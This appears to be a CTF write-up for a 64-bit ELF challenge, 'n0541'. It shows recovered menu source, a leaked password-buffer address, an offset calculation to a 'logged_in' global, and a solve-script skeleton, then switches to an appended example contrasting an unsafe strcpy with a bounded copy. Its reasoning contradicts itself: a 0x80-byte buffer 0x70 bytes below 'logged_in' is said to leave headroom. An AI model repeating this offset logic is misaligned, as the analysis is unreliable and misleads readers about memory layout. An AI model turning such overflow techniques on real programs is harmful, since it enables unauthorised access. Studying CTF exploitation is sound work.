# tokyohot n0541

(CTF challenge, binary exploitation / reverse-engineering)

## 1. Overview

| Category | Service | Difficulty | Points |
|----------|---------|------------|--------|
| Binary / Reversing | tokyohot – n0541 | Medium-Hard | 452 |

The challenge is a 64-bit ELF binary that runs locally on the provided Docker image. It listens on a TCP port (or can be run interactively) and offers a simple menu-driven interface. The goal is to gain a remote shell (or read the flag) by exploiting a vulnerability in the program.

The relevant parts of the recovered source are the includes, the two globals that matter for the bug, and the menu routine:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* user_t is not reproduced on this page; users[] holds the registered accounts */
user_t users[10];
int logged_in = 0;

void menu(void)
{
    puts("\n--- TokyoHot ---");
    puts("1) Register");
    puts("2) Login");
    puts("3) Show secret");
    puts("4) Exit");
    printf("> ");
}
```

Registering a user shows a debug line with the address of the password buffer:

```text
$ ./n0541
1) Register
> 1
Name: AAAAA...
Password: BBBBB...
[debug] pwd ptr = 0x603090
```

The global `logged_in` lives at 0x603200. The distance is:

```text
0x603200 - 0x603090 = 0x70 (112) bytes
```

The password buffer is only 0x80 (128) bytes, so we have headroom before we start overwriting `logged_in`.

Skeleton of the solve script:

```python
import socket

# HOST, PORT and the register / login_overwrite / get_flag helpers live
# elsewhere in the script and are not reproduced on this page.
def main():
    s = socket.create_connection((HOST, PORT))
    register(s)
    login_overwrite(s)
    get_flag(s)
    s.close()
```
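As an added example (not the challenge binary's or the writeup's code), the unbounded-copy pattern behind this bug next to a bounded version that can never run past the 0x80-byte password buffer into `logged_in`. The `user_t` layout, `NAME_LEN`, `set_password` and `demo` are assumptions made for the example.

```c
#include <string.h>

#define NAME_LEN 0x20   /* assumed: the page does not give the name field size */
#define PWD_LEN  0x80   /* the 128-byte password buffer from the writeup */

/* Assumed layout: the page shows users[10] and logged_in but not user_t itself. */
typedef struct {
    char name[NAME_LEN];
    char pwd[PWD_LEN];
} user_t;

user_t users[10];
int logged_in = 0;

/* The bug class the writeup exploits: no bound on the copy, so a password
 * longer than PWD_LEN - 1 keeps writing past pwd into whatever follows it. */
void set_password_unsafe(user_t *u, const char *src)
{
    strcpy(u->pwd, src);
}

/* Hardened form: look for the terminator inside the buffer's capacity and
 * refuse the input if there is none. Nothing is written on rejection. */
int set_password(user_t *u, const char *src)
{
    const char *nul = memchr(src, '\0', PWD_LEN);
    if (nul == NULL)
        return -1;                      /* would need PWD_LEN bytes or more */
    memcpy(u->pwd, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Self-check: a constructed 135-character password (like the writeup's long
 * 'BBBB...' input) must be rejected, leaving the stored password and
 * logged_in untouched. Returns 1 when every check passes. */
int demo(void)
{
    char big[PWD_LEN + 8];
    memset(big, 'B', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return set_password(&users[0], "hunter2") == 0
        && strcmp(users[0].pwd, "hunter2") == 0
        && set_password(&users[0], big) == -1
        && strcmp(users[0].pwd, "hunter2") == 0
        && logged_in == 0;
}
```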